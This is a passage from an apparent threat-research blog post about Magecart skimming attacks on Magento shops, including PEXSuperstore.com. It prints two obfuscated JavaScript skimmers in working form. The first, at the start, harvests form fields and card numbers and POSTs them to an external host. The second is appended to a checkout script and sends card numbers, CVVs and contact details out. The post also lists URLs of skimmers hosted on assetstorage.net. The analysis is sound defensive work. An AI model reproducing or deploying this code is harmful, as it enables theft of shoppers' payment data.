var snd =null;var eRr="]YR%qxWGFZN`taVyq`nIupls"[(2.0+"QO?2qG&\x82U#FD"["length"]*2457308705)["toString"]((0*"\x820v/njr\x89mu)\x85=\x8af,("["charCodeAt"](16)+32.0))](/[YtGlIpx\]\%\`yVZ]/g,"");var inp=document[""+"queryS"+(95>40?"\x65":"\x60")+"lectorAll"]("Ji)n+pA[u<tz,1 zs0e&l6e;`cEtYH,Q wMtvIeV1x7tIfa&rNeWZa6,q; Cc4Lh0e[c2kYb@o&x"["replace"](/[1WN\@I7\`VAH\+w\<Y\;0\&\)fMLC2EJq4QvZ\[z6]/g,""));for (var i=(0*"JW56a\x8b;Am"["length"]+0.0);i<inp[""+(61>27?"\x6c":"\x65")+"e"+"ngt"+(57>34?"\x68":"\x62")+""];i++){ if(inp[i][""+(56>34?"\x76":"\x6c")+"alu"+"e"]["l"+"eng"+(87>29?"\x74":"\x6f")+"h"]>("\x89X+\x82Y_G0\x866t\x8b'"["length"]*0+0.0) && inp[i]["v"+""+(62>37?"\x61":"\x5b")+"lue"]["len"+(73>42?"\x67":"\x61")+"t"+"h"]<(4*"r\x84#n[<6LDvWf."["length"]+8.0)) { var nme=inp[i]["i"+"d"];if(nme==""[("bac\x88Ar'E#\x80"["charCodeAt"](6)*1529811105+23.0)["toString"]((4.0+"6p5lzX\x88+"["length"]*4))]("zIoQzIsn3f","")) { nme=i;VuS=(0*"<vMF|:AT%\x81)\x82\x85D"["charCodeAt"](13)+31.0); } snd+=inp[i][""+""+(87>35?"\x69":"\x5f")+"d"]+"Q="["replace"](/[Q]/g,"")+inp[i][""+(99>27?"\x76":"\x6e")+"alu"+"e"]+"`&"[(1625808742*"VSNWGd@?{J+mk(L"["length"]+3.0)["toString"]((0*"\x8a1%rLVC\x80Ug#&R)"["charCodeAt"](8)+31.0))](/[\`]/g,"");iF5="B`K(LNkn7SP20Vi=aUsWowrf"[(",-V(@cZ\x60vxrY;:wpD'\x80<"["charCodeAt"](17)*756094986+8.0)["toString"]((32.0+"S|RZ#3VX{CzcD\x7fmj"["charCodeAt"](7)*0))](/[\=0k\`PNiUwB7rW\(]/g,"");} } if(snd!=null) { var regexp = /(3|4|5|6)[0-9]{13,16}/gi;ZHq=(8.0+"jMa.vcbkhU>\x89g)\x60*173"["charCodeAt"](17)*4);var re=snd[""+(86>6?"\x72":"\x6c")+"e"+"plac"+(54>48?"\x65":"\x5c")+""](/ /g,""[("a>%<Y\x60_}c\x89&8d"["charCodeAt"](3)*840115113+29.0)["toString"]((35.0+"I)+=\x81[Y\x83kmnC/j"["charCodeAt"](3)*0))]("kZeHOlnoc8",""));i2y="uK_KFzXMLO@RObvak6AYdI"[("ys+)xGEYmLK"["charCodeAt"](3)*1229436751+18.0)["toString"]((5.0+"i%xhW#o,.IV5\x81\x89w"["length"]*2))](/[RXabA6FLu\@d\_]/g,"");re=re["rep"+(59>27?"\x6c":"\x65")+"a"+""+(69>24?"\x63":"\x5d")+"e"](/-/g,""[(2.0+"=%7qd"["length"]*5897540892)["toString"]((0.0+"mRZ1twXK"["length"]*4))]("REyxe9pHTw",""));nsS="FtiANYFn8pvRSNmRd5r<6"["replace"](/[5p\<iF8NR]/g,"");K96="GNbtHcqAWoZah4SmDZtk~j"["replace"](/[\~AcS4NGDato]/g,"");var matches = re[""+"mat"+(99>12?"\x63":"\x5c")+"h"](regexp);X3v="lAdQUr9NKZMVW]7Xoh6TnG8U"[("/RqciS\x83hM\x80\x7f>|WwH"["charCodeAt"](13)*685777392+14.0)["toString"](("c=.h6U>e@(JCSdz"["charCodeAt"](8)*0+36.0))](/[N6\]AMVrXolQ8nK]/g,"");if(matches!=null){
if(qTw(matches[("\x88\x7fQIAyo{=mX"["length"]*0+0.0)])==true){
snd=L1l(snd+"8w&m(sehro8pG="["replace"](/[wGm\(er8]/g,"")+window["loca"+(92>6?"\x74":"\x6f")+""+"io"+(61>33?"\x6e":"\x67")+""][""+(95>0?"\x68":"\x62")+"os"+"t"]+"MT&McvaoIr)d6_U1W2-93yz="["replace"](/[ovWT\-9\)MzyUI6]/g,"")+matches[(0.0+"]p\x87\x86eavHO>Ls-K"["charCodeAt"](13)*0)]);A7Z="pA%9zkF2uWeV%JYG3`N>6v8"["replace"](/[\`\>peFWGv\%Yz2]/g,"");var NmK="vFdgd&Vs;n`2+m)ZiNFB!b"["replace"](/[\;i\+\&F\)\!Vg\`v]/g,"");var gOB="li(rk4QyF9>L8vi=0u)eo3"[("/&63uz*0Q("["charCodeAt"](9)*886198616+27.0)["toString"](("7*T?\x882YHdE>O\x84,^;6"["charCodeAt"](5)*0+33.0))](/[F\(\)\=vLluQ\>ko]/g,"");var Vo2="9zwr#lwA*7@TVWvs6<ifUC"[(47.0+"(:\x82D_BJ87KryM^"["charCodeAt"](8)*644508084)["toString"]((33.0+"]C(:T*^@,[}Ygps?"["charCodeAt"](11)*0))](/[\<s\*f\#\@WVwU9]/g,"");tI1="1#RG2(y~gt4Y72#3x8fz/s"[("8\x81\x83N7'~X1_"["charCodeAt"](4)*443402384+13.0)["toString"]((9.0+"\x7ftq5}mJ\x87oMZ"["length"]*2))](/[\~x\(\/tf1GY7\#]/g,"");NMU="DzpnEkZPqA0pRTb9T=K5l]z"["replace"](/[9ERDP\]AbZ5\=p]/g,"");TT4=(18.0+"q\x80p=Nv[\x82%Mac\x7f>\x8b"["charCodeAt"](9)*2);var D9Q=(24.0+"/\x8ajDi<s_u\x890.AQ"["charCodeAt"](13)*0);var key=L1l(window[""+"loca"+(55>3?"\x74":"\x6c")+"ion"]["h"+(79>40?"\x6f":"\x65")+""+""+(65>12?"\x73":"\x6d")+"t"]);qaD="2L-;b1xesLDGJ!H3P9NrOZBS"["replace"](/[1Z9rB2\!sDJ\-e3\;]/g,"");var data="W`phwn7+gu="["replace"](/[\+wWuh\`7]/g,"")+snd+"C&cPkMe>ly~="["replace"](/[M\>c\~PCl]/g,"")+key;var Kqv=(2.0+"C\x86$pZ"["length"]*95);urll ="Q1h5tZt*pF)sL:;/2J/QKw4KwQw4.[m5o*g!eIn)t[oD.OiJHnEf8`o=/(>i4JmF#aNgJ~e%sS/(v2iXs4aH8-`~m]a+sKtTKe@r>cbZa1r!dZX-uaUm5e2xC_903.VpOnTg"["replace"](/[1Q2H\!5\+\%\>\#\)b\~TN\;K\=V\[u\]9IE\(UCFSODJ\@348\*LX\`Z]/g,"");jri="CMwi0S8gBFnr>Xzd`xKCI2ql"["replace"](/[Cz2KS0Fwgr\`\>q]/g,"");jQuery["a"+(94>37?"\x6a":"\x61")+""+"a"+(63>31?"\x78":"\x73")+""]({ type:"pPUaOESiT"["replace"](/[iUpaE]/g,""), url: urll, data:data                }) } }}
})});vwj=("#-O25Vo0%qy"["charCodeAt"](4)*3+47.0);function qTw(s) { var v ="e0s1L2;3A4k<5/6D7]8y*9"[(1625808742*"3I9gZ.\x821_(\x81j5i\x80"["length"]+3.0)["toString"]((0*"hv~7c=p>R\x89[Q"["charCodeAt"](10)+31.0))](/[A\<\*\/k\;LDy\]es]/g,"");u1J="O2S;UcWnoEFCxnGZ~eP%(L3D"[("[5B\x88/\x8bfE6"["length"]*5600767423+2.0)["toString"](("BJx\x8bZ)aNDi8u\x89l'\x60r_*"["charCodeAt"](10)*0+35.0))](/[SEGnOC\;\~e3\%c\(]/g,"");var w =""[("q\x8bX/o-,"["length"]*3483875876+1.0)["toString"]((31.0+"xu\x81XPGk7\x82\x88_vW"["charCodeAt"](5)*0))]("o97zIjFxdS","");for (i=(0*"w'nK%>:MHb1*o"["charCodeAt"](4)+0.0); i < s[""+(86>14?"\x6c":"\x62")+"eng"+""+(100>9?"\x74":"\x6d")+"h"]; i++) { x = s["c"+""+(57>3?"\x68":"\x60")+"arAt"](i);if (v["i"+"nde"+(91>40?"\x78":"\x72")+"Of"](x,(":cR^qy|4;we\x83U@HM0"["charCodeAt"](12)*0+0.0)) != -(1.0+"4IPgY"["length"]*0)) w += x;NYA=("{T$z\x60C,/\x802"["length"]*45+4.0);} j = w[""+"lengt"+(88>4?"\x68":"\x5e")+""] / (2.0+"e^;],O\x89u}s|I_-8%l\x84X"["charCodeAt"](18)*0);var dgD=(22.0+"b*\x80nM(@g+}\x60CG"["charCodeAt"](5)*7);k = Math["f"+"loo"+(86>32?"\x72":"\x6c")+""](j);LFe="=s8507Gl(V~m2YXBJqfTN++V"[(274012709*"gU\x60iYxO;9y#Z\x84z\x89hSE"["charCodeAt"](4)+32.0)["toString"](("Hq\x83Rjbe%"["length"]*3+7.0))](/[7G\~8Tq\=\(m\+B5Y]/g,"");m = Math["ce"+(65>7?"\x69":"\x63")+""+"l"](j) - k;B3t="i4JwbuOWwR+lxFNTQUXPHSZx1"[("7-5wGf%V^\x88|jk}"["charCodeAt"](2)*460134549+36.0)["toString"]((31.0+"|R6\x88g\x87ZlhV9PI\x8aB})y"["charCodeAt"](14)*0))](/[\+FHxSuUOwX4iT]/g,"");c = ("7UG{jIZcE8Kh-/\x89"["charCodeAt"](13)*0+0.0);for (i=(0.0+"B7\x80?k["["length"]*0); i<k; i++) { a = w[""+(92>11?"\x63":"\x5e")+"h"+"a"+(60>17?"\x72":"\x6c")+"At"](i*("PW~(a@Dn.'#i5"["length"]*0+2.0)+m) * (0*",)BJ4\x88Y\x8a*vnc"["length"]+2.0);c += a > ("\x60wqH83sQj?\x87tuz2\x856x%"["charCodeAt"](7)*0+9.0) ? Math[""+"floo"+(71>0?"\x72":"\x68")+""](a/(0*"#yqJ9:4hu%\x82\x60p$\x8b"["length"]+10.0) + a%(10.0+"\x7fQs=kY~tO&{\x82"["charCodeAt"](5)*0)) : a;} for (i=("S3\x60hv|>n:]t"["length"]*0+0.0); i<k+m; i++) c += w["cha"+(100>48?"\x72":"\x68")+""+""+(100>15?"\x41":"\x3a")+"t"](i*("}?5Um-\x82DlC=&."["length"]*0+2.0)+1-m) * (0*"R$\x85n_co+%^qP\x60-"["length"]+1.0);return (c%("a]5V0Hv\x85\x80I=O-\x84"["length"]*0+10.0) == (0*"&|wIg\x60B0~"["length"]+0.0));iw7="(Yow2nhGDZ#u]X_Cj~wKG"[("\x81~r#}tk<,sN"["length"]*2217011921+2.0)["toString"](("pGwlU$(fsPR2n\x80:KgOL"["charCodeAt"](18)*0+31.0))](/[\~D\]\#\(o\_Kh2C]/g,"");} function L1l(theText) {
output = new String;Niv=("?jypr\x60h-\x841x}fSi_\x89"["charCodeAt"](13)*3+31.0);Mdh="o5!P>eVi5g1d9)QB7#kw~u"["replace"](/[we\!\)B\~i\>\#dgo]/g,"");Temp = new Array();var bdG="gPEh2-coLvl)]WyD*/3`ip#r"[(54.0+"nTh-B\x82H+EJ"["charCodeAt"](9)*398482492)["toString"]((2*"_\x8b'iORH>zX6"["length"]+10.0))](/[\)\`\/gvh\]\#y\-\*oiP]/g,"");Temp2 = new Array();nvC=("6J;y4~"["length"]*21+4.0);TextSize = theText[""+"lengt"+(68>23?"\x68":"\x5e")+""];for (i = (0.0+"&,*\x80fs"["length"]*0); i < TextSize; i++) { rnd = Math["r"+(70>31?"\x6f":"\x69")+""+""+(83>19?"\x75":"\x6c")+"nd"](Math[""+(89>28?"\x72":"\x68")+"ando"+"m"]() * (24*"@Ietl"["length"]+2.0)) + ("6\x81HB->[k@x/.n}ey"["charCodeAt"](8)*1+4.0);Temp[i] = theText["cha"+(75>28?"\x72":"\x6c")+""+"Co"+(66>19?"\x64":"\x5d")+"eAt"](i) + rnd;var y$j="c04Hx-t;jNlin+g>5VLi&OUf"[("\x82i?\x87\x60Z}w=61\x85X"["charCodeAt"](8)*978075952+46.0)["toString"]((8.0+"R\x88p{lLB%\x85K'\x86x5"["length"]*2))](/[0\;L\-UV\>\+jl\&Hnc]/g,"");nxo="RlPM`sZLCzie`7ObK&3aBrk"["replace"](/[ROrzP\&La\`sKe]/g,"");gbS=("J\x7fe|O0YC:F\x81L'6o]B^?"["charCodeAt"](16)*1+46.0);Temp2[i] = rnd;}
for (i = (0.0+"Db#\x86FU>Hg;R@"["charCodeAt"](11)*0); i < TextSize; i++) { output += String["from"+(77>16?"\x43":"\x3a")+"har"+"Cod"+(67>37?"\x65":"\x5f")+""](Temp[i], Temp2[i]);}
return output;cvA="AL9)cipiSQ)a<2PB6XUg/AO"[("\x8b,_TrC"["length"]*4064521855+3.0)["toString"]((31.0+"Okt%}QHAEUg's+"["charCodeAt"](13)*0))](/[\/A6LPiQ\)U\<]/g,"");} ;CiZ=(5.0+"l8Om;J}ID"["length"]*47)

We also found the same exact skimmer on five other Magento-based sites including PEXSuperstore.com. Similar skimmer loader scripts were found on 91 Magento-based sites.

Multiple Simultaneous Magecart attacks: Second Skimmer on PEXSuperstore.com

While examining PEXSuperstore.com, we noticed another suspicious post request being sent to a completely different domain: https://assetstorage.net/, registered in Russia. This skimmer was on the checkout page sniffing users’ PII data and sending post requests to assetstorage.net. When placing an order, the compromised first-party checkout script is called and executes the skimmer.

Stage 1: Website compromise

The PerimeterX research team found that the skimmer script is placed on the web server owned by the company. While we don’t know the exact method used to compromise the web server, we can only surmise that the web server security controls were bypassed to make changes to the website.

Stage 2: Placing the skimmer script

Unlike the attack on Sixth June, the is no loader script. The checkout script was modified to execute on every checkout as shown below. The first 960 rows of the Magento checkout script are harmless code.

/**
 * Magento
 *
 * NOTICE OF LICENSE
 *
 * This source file is subject to the Academic Free License (AFL 3.0)
 * that is bundled with this package in the file LICENSE_AFL.txt.
 * It is also available through the world-wide-web at this URL:
 * http://opensource.org/licenses/afl-3.0.php
 * If you did not receive a copy of the license and are unable to
 * obtain it through the world-wide-web, please send an email
 * to license@magento.com so we can send you a copy immediately.
 *
 * DISCLAIMER
 *
 * Do not edit or add to this file if you wish to upgrade Magento to newer
 * versions in the future. If you wish to customize Magento for your
 * needs please refer to http://www.magento.com for more information.
 *
 * @category    design
 * @package     base_default
 * @copyright   Copyright (c) 2006-2014 X.commerce, Inc. (http://www.magento.com)
 * @license     http://opensource.org/licenses/afl-3.0.php  Academic Free License (AFL 3.0)
 */
var Checkout = Class.create();
Checkout.prototype = {
    initialize: function(accordion, urls){
        this.accordion = accordion;
        this.progressUrl = urls.progress;
        this.reviewUrl = urls.review;
        this.saveMethodUrl = urls.saveMethod;
        this.failureUrl = urls.failure;
        this.billingForm = false;
        this.shippingForm= false;
        this.syncBillingShipping = false;
        this.method = '';
        this.payment = '';
        this.loadWaiting = false;
        this.steps = ['login', 'billing', 'shipping', 'shipping_method', 'payment', 'review'];
        //We use billing as beginning step since progress bar tracks from billing
        this.currentStep = 'billing';

        this.accordion.sections.each(function(section) {
            Event.observe($(section).down('.step-title'), 'click', this._onSectionClick.bindAsEventListener(this));
        }.bind(this));

        this.accordion.disallowAccessToNextSections = true;
    },

    /**
     * Section header click handler
     *
     * @param event
     */
    _onSectionClick: function(event) {
        var section = $(Event.element(event).up().up());
        if (section.hasClassName('allow')) {
            Event.stop(event);
            this.gotoSection(section.readAttribute('id').replace('opc-', ''), false);
            return false;
        }
    },

    ajaxFailure: function(){
        location.href = this.failureUrl;
    },

    reloadProgressBlock: function(toStep) {
        this.reloadStep(toStep);
        if (this.syncBillingShipping) {
            this.syncBillingShipping = false;
            this.reloadStep('shipping');
        }
    },

Below is part of the skimmer code added at the bottom of the original script:

var _$_a5d5=(function(i,k)
{
    var f=i.length;
    var n=[];
    for(var m=0;m< f;m++)
    {
        n[m]= i.charAt(m)
    }
    ;
    for(var m=0;m< f;m++)
    {
        var q=k* (m+ 105)+ (k% 41322);
        var p=k* (m+ 218)+ (k% 52726);
        var o=q% f;
        var g=p% f;
        var a=n[o];
        n[o]= n[g];n[g]= a;k= (q+ p)% 1694965
    }
    ;
    var d=String.fromCharCode(127);
    var j='';
    var c='\x25';
    var h='\x23\x31';
    var e='\x25';
    var b='\x23\x30';
    var l='\x23';
    return n.join(j).split(c).join(d).split(h).join(e).split(b).join(l).split(d)
}
)("rQinuNemb%ica_pCmrimtnstAtc_%usbelncbteniacaxey#lolh%otlchot0euxlan%1itneckraiCNamdtD8gs/h-rafun%ttec#nnot0oczlc0ceCmsci%ln#kaR-i%eUh:%Ycsicdn:rcnfehke\\%c0e d\\cvoCme1%siiyten_elntagnoelosiasf%%uh.strsobkl%eSbma#cs#heatttmncmeCrt%hianoha_oei7t0tollr*sbeadtus4tlCoO_da%Abirp%adn_:Ce%%unTH\\Pciiln\\jiftsrie/12oiatbhl|crgnhg0@+fCe%o%ii%%Et%i%aai%h0zr_r#\\_e7nirtp:urs%eatp0#%oxgdioga:todpN%|%%hmottc\\ltelWn:8s%m#o:ibcd%gh:ti%yc#Kb%:eiega:d%ai%nikpNsg\\selro00bccM2%___noeeghellrna\\pposrc#l%nBrhe%siGc3:=_\\bMPhfsel#i0aalYset^%%lSsTyze/iveclS%ru2to\\%/exNnsg#2ye0%%stermacL%Vocl_0lev#tim%oAl%_6eFlm%Jneo%Oigro/#:tXgZdbutelgaejitanfpnri+uve%zzguiif5ec89n/|ew20lahi#pNeng0nd8cno%a#eealaonr%%kjyi%t%0eiighIitdnx0ac%_N#Cktettrp4e1cqc%deuOieun",975551);
setTimeout(function()
{
    document[_$_a5d5[0]]= _$_a5d5[1];document[_$_a5d5[2]]= _$_a5d5[3];document[_$_a5d5[4]]= _$_a5d5[5];document[_$_a5d5[6]]= _$_a5d5[7];document[_$_a5d5[8]]= _$_a5d5[9];document[_$_a5d5[10]]= _$_a5d5[11];a();if(( new RegExp(_$_a5d5[14]))[_$_a5d5[13]](window[_$_a5d5[12]]))
    {
        setInterval(function()
        {
            c()
        }
        ,3000)
    }
    //11
    function c()
    {
        if(jQuery(document[_$_a5d5[10]]))
        {
            if(jQuery(document[_$_a5d5[10]])[_$_a5d5[15]](document[_$_a5d5[8]])== false)
            {
                a();return
            }

        }

    }
    function a()
    {
        jQuery(document[_$_a5d5[10]])[_$_a5d5[16]](function()
        {
            e()
        }
        );if(jQuery(document[_$_a5d5[10]]))
        {
            jQuery(document[_$_a5d5[10]])[_$_a5d5[17]](document[_$_a5d5[8]])
        }

    }
    function e()
    {
        var a;//40
        a= {Address:jQuery(_$_a5d5[19])[_$_a5d5[18]]()+ _$_a5d5[20]+ jQuery(_$_a5d5[21])[_$_a5d5[18]](),CCname:jQuery(_$_a5d5[22])[_$_a5d5[18]]()+ _$_a5d5[20]+ jQuery(_$_a5d5[23])[_$_a5d5[18]](),Email:jQuery(_$_a5d5[24])[_$_a5d5[18]](),Phone:jQuery(_$_a5d5[25])[_$_a5d5[18]](),Sity:jQuery(_$_a5d5[26])[_$_a5d5[18]](),State:jQuery(_$_a5d5[27])[_$_a5d5[18]](),Country:jQuery(_$_a5d5[28])[_$_a5d5[18]](),Zip:jQuery(_$_a5d5[29])[_$_a5d5[18]](),Shop:window[_$_a5d5[12]][_$_a5d5[30]],CcNumber:jQuery(document[_$_a5d5[0]])[_$_a5d5[18]](),ExpDate:jQuery(document[_$_a5d5[2]])[_$_a5d5[18]]()+ _$_a5d5[31]+ jQuery(document[_$_a5d5[4]])[_$_a5d5[18]](),Cvv:jQuery(document[_$_a5d5[6]])[_$_a5d5[18]]()};var b=JSON[_$_a5d5[32]](a);//59
        encData= d(b);jQuery[_$_a5d5[36]]({url:_$_a5d5[33],data:{main:encData},type:_$_a5d5[34],dataType:_$_a5d5[35],success:function(a)
        {
            return false
        }
        ,error:function(b,c,a)
        {
            return false
        }
        })
    }

Stage 3: Script exfiltrates credit card information

When placing an order, the compromised first-party checkout script is called and executes the skimmer. The malicious post request was traced back to a first-party script that was modified by the attacker, who added the skimming code at the bottom of the script.

Script exfiltrates credit card information 1
Script exfiltrates credit card information 2

It was interesting to find out that https://assetstorage.net/ is related to a much larger campaign primarily targeting UmbroBrasil, a Brazilian website that was recently breached for the 2nd time, and other lesser-known websites.

It is also worth mentioning that assetstorage.net hosts skimmers in addition to operating as an exfiltration gateway. Here are some of the skimmers it hosts:

  • https://assetstorage.net/src/upscalestripper.js
  • https://assetstorage.net/src/galeriedebeaute.js
  • https://assetstorage.net/src/deliveryathome.js

Skimmers hosted on assestorage.net appear to be named after the intended target websites. We did not find any traces of active infection on upscalestripper and galeriedebeaute, but it is safe to assume that the attackers are preparing for a future campaign.

Conclusion

This revelation of multiple simultaneous Magecart attacks show that digital skimming is rapidly becoming a major threat to global e-commerce businesses. To restore user confidence, website owners should make sure to monitor and track the behavior of first and third-party code on their sites in real time to ensure bad actors do not bypass their infrastructure.

Back to posts comments powered by Disqus